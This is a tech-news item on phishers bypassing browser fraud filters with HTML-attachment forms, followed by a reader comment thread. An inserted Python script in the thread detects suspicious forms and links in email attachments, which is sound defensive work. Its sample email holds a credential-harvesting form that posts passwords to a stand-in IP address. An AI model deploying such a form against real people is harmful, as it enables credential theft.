Phishers dodge fraud protections in Firefox, Chrome

A recent round of phishing attacks targeting customers of Bank of America and PayPal circumvent fraud protections built in to the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email. According to M86 researcher Rodel Mendrez, the locally stored file opens a web form that collects the customers …


  1. Anonymous South African Coward

    Function PhisherPumper();

    Isn't there any way to have some application pump said phishing site full of random gibberish?

    I reckon if we pump some phishing DBs full of absolutely useless rubbish, then it'll be harder for them to get proper, working credentials...

    1. David 164

      Someone did do this once upon a time but

      This approach was used a few years ago against spammers; it was declared illegal in several countries, as vigilantism in general is forbidden.

  2. Elmer Phud
    IT Angle

    hang on a min

    People get an email and fill in a form that comes with it?

    They don't go to the website and check it's a secure link before filling in personal details instead?

    They don't check where the form is going?

    Ah well.

    1. John Riddoch

      Simple answer...

      Many of the most important dilemmas of life become simple when you realise a basic truth - "People are stupid."

      For as long as there are idiots who blindly trust these kinds of forms, there will be people who will try to scam them.

      1. Anonymous Coward

        @simple answer

        I hate ignorant people such as yourself.

        People are not stupid, people are trusting; it's been part of our makeup for tens of thousands of years and it's what allows us to progress.

        When you take your car to a garage for repairs you trust that they won't cut your brake lines and jam your throttle on when it gets to 4000rpm. What, you don't check these when you pick it up?

        You buy a burger presuming someone hasn't crapped on it. What, you don't open it and examine it in detail? Is that really mayo?

        You buy a ladder presuming that all the rungs are securely attached. What, you don't check them before climbing it?

        You open an email from Bank of XXXXX and you presume it is from them.

        They are not stupid; they just are not aware of the risks. Big difference.

        1. Marcelo Rodrigues

          And ignorant people such as yourself? Do you hate them too?

          Stupid people are trusting, not the other way around.

          I don't trust that they will not cut my brakes. I HOPE they will not do it. I BELIEVE they will not do it - basically because they would be caught after the third death in a row.

          By the same logic, I BELIEVE my burger is crap-free when I buy it from a reputable place. Because you can't keep a business which sells bad food every now and then. Because, you see, your customers (ex-customers, should I say?) would not be very happy.

          And I DO check a ladder before buying it. Don't you?

          And make up your mind. Do I know this email is from Bank DDD or not? Because, you see, this only works if the email isn't - and you think it is.

          So, yes. They are stupid. Either because they know how to tell one email from the other - and failed - or because they don't know that they don't know how to tell one email from the other, and chose to click the same way.

          One is not stupid because of his/her ignorance. One is stupid when he/she doesn't know that he/she doesn't know.

          Terminator, because he knows how to do what he was supposed to.

        2. Dave Murray

          People are stupid

          I see it every day.

          In the case of phishing emails there is one simple rule that will protect you - DO NOT USE A LINK IN AN EMAIL TO LOG IN TO ANYTHING THAT COULD COST YOU MONEY. Always open your browser and visit the site using a bookmark or a Google/Bing search. ALWAYS.

          Anyone with half a brain should realise that emails from banks are often not legit, given the number they receive from banks that they are not customers of. But most are too busy thinking about football, celebrities or the state of their fake tan to pay attention.

          1. Ammaross Danan

            "visit the site using a bookmark or a Google/Bing search."

            With blackhat SEO (search-engine optimization for those not-in-the-know), it's very easy to get a site near the top (if not THE top) of Google or Bing that even appears to be the site you are looking for. Even the "URL" displayed below (shown in green on Google) does not display the actual URL of the site. I've stumbled upon these myself.

            The best way to visit Bank of America or the like? Type: "" into your address bar. If you've got a decent browser, it will DNS resolve and take you straight to their website. If you don't, it might land you on a Google page with BoA as the first link, hopefully. (those that just typed "bank of america")

  3. MistoRoboto

    You could say...

    you can't just zap one. :-D

  4. bex

    this is not new

    I have seen this sort of thing for years; it's hardly new.

  5. Richard Porter
    Black Helicopters

    Don't use html messages

    "few PHP URLs get reported as abusive by most end users because of the technical expertise that's required. With not visible HTML accompanying them, there's little for the average user to go on."

    Phishing scams start with email messages that tempt you to open web pages, whether local, on some compromised computer or on the scammer's server. The number one rule should be never to read html messages, even if that means not using webmail services. Use a decent email client like Messenger Pro that allows you to work in plain text, and strips out the markup in html-only messages. You can also view the raw message if you want to. If you can see what the link URLs actually are then it is usually obvious when they are malign (but watch out for small spelling alterations in domain names). I have recently received several phishing messages that post forms to .ru addresses although they purport to come from UK banks.
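The article describes an HTML file attached to the mail that opens a locally stored form posting the customer's details to the phisher's server, and the comment above suggests reading the raw message and checking where the links and forms actually point. As an added example (it is not part of the article or of any comment), here is a Python script that performs that check automatically over a constructed sample message using only the standard library: it parses the .eml, pulls out the HTML attachments, and reports password fields, form actions, and links whose real host does not match the domain the sender claims. The sample message, the file name verify.html, and every host in it are constructed; the `registrable_domain` helper is a two-label approximation, not a public-suffix lookup.

```python
"""Find where the forms and links inside an e-mail's HTML attachments really point.

Added example built on the Python standard library. The sample message, its
attachment name and every host it contains are constructed, not a real phish.
"""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the mail claims to be from bank-of-example.test, but the
# attached form posts to a bare IP and the link text hides an unrelated host.
SAMPLE_EML = """\
From: "Bank of Example" <alerts@bank-of-example.test>
To: victim@example.test
Subject: Please verify your account
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain; charset="us-ascii"

Please open the attached form to verify your account details.

--XYZ
Content-Type: text/html; charset="us-ascii"; name="verify.html"
Content-Disposition: attachment; filename="verify.html"

<html><body>
<form method="post" action="http://203.0.113.5/collect.php">
  <input name="user"><input name="pass" type="password">
  <input type="submit" value="Verify">
</form>
<a href="http://secure-login.invalid/">www.bank-of-example.test</a>
</body></html>
--XYZ--
"""


class FormLinkExtractor(HTMLParser):
    """Collect form actions, password fields, and anchors with their visible text."""

    def __init__(self):
        super().__init__()
        self.forms = []            # action URL of every <form>
        self.links = []            # (href, visible text) of every <a href>
        self.password_inputs = 0   # number of <input type="password">
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # bare attributes arrive as None
        if tag == "form":
            self.forms.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "a" and "href" in a:
            self._href, self._text = a["href"], []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Last two labels of a host name; a rough stand-in for a public-suffix lookup."""
    return ".".join(host.lower().strip(".").split(".")[-2:])


def claimed_domain(raw):
    """Domain of the From: address, i.e. who the mail says it is from."""
    msg = email.message_from_string(raw, policy=policy.default)
    return registrable_domain(msg["from"].addresses[0].domain)


def html_attachments(raw):
    """Yield (filename, decoded HTML) for each text/html attachment."""
    msg = email.message_from_string(raw, policy=policy.default)
    for part in msg.iter_attachments():
        if part.get_content_type() == "text/html":
            yield part.get_filename(), part.get_content()


def analyze_message(raw):
    """Return (attachment, finding, host) triples for each suspicious form or link."""
    claimed = claimed_domain(raw)
    findings = []
    for name, html in html_attachments(raw):
        p = FormLinkExtractor()
        p.feed(html)
        if p.password_inputs:
            findings.append((name, "password-field", str(p.password_inputs)))
        for action in p.forms:
            host = urlparse(action).hostname or ""
            if host.replace(".", "").isdigit():
                findings.append((name, "form-ip-literal", host))
            elif host and registrable_domain(host) != claimed:
                findings.append((name, "form-external", host))
        for href, text in p.links:
            host = urlparse(href).hostname or ""
            if host and registrable_domain(host) != claimed:
                # Visible text names the bank's domain while the href goes elsewhere.
                kind = "link-text-mismatch" if claimed in text.lower() else "link-external"
                findings.append((name, kind, host))
    return findings


if __name__ == "__main__":
    for name, kind, host in analyze_message(SAMPLE_EML):
        print(f"{name}: {kind} -> {host}")
```

Run against a saved message with `analyze_message(open("mail.eml").read())`. Any HTML attachment that contains a password field, or whose form posts to an IP literal or to a host outside the sender's domain, is worth treating as a phish regardless of how the page renders; browser URL blocklists never see a form that was opened from the local disk.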

  6. SuperTim

    spam filter?

    These things are immediately filtered out by most spam filters, so unless you go out of your way to open the email (already identified as spam) you will have a job falling foul of these attacks. That said, there are some incredibly naive people out there who have no idea that this sort of thing happens. Poor loves.

  7. doperative

    phishing attacks defeat Firefox and Chrome

    > A recent round of phishing attacks targeting customers of Bank of America and PayPal circumvent fraud protections built in to the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email.

    Do these phishing attacks work on the Mac or Linux, or with scripting disabled in your email application, and can I have a link to a working demo?

    1. Panix

      No thanks

      Nerds don't have money in the bank. All their money is in Star Trek and Tux dolls. Why target a group where you can't "cash out big"?

    2. Aaron Em

      Do your own homework, script kiddie

      srsly 0/10
